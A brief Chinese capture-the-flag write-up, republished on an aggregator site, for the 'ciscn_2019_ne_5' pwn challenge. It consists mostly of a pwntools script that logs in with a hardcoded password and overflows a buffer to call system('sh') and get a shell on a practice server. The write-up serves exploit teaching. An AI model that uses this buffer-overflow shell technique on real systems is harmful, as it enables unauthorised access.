ciscn_2019_ne_5
Posted gaonuoqi
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了ciscn_2019_ne_5相关的知识,希望对你有一定的参考价值。
ret2text类型
从fflush中获取 “sh” 传参给system即可
脚本如下
from pwn import * r=remote(‘node3.buuoj.cn‘,25488) e=ELF(‘ciscn_2019_ne_5‘) sys_plt=e.plt[‘system‘] sh_addr=0x80482ea r.recvuntil(‘Please input admin password:‘) r.sendline(‘administrator‘) r.recvuntil(‘0.Exit :‘) r.sendline(‘1‘) payload=‘a‘*0x4c+p32(sys_plt)+‘aaaa‘+p32(sh_addr) r.recvuntil(‘Please input new log info:‘) r.sendline(payload) r.recvuntil(‘0.Exit :‘) r.sendline(‘4‘) r.interactive()
以上是关于ciscn_2019_ne_5的主要内容,如果未能解决你的问题,请参考以下文章
&pwn1_sctf_2016 &ciscn_2019_n_1 &ciscn_2019_c_1 &ciscn_2019_en_2&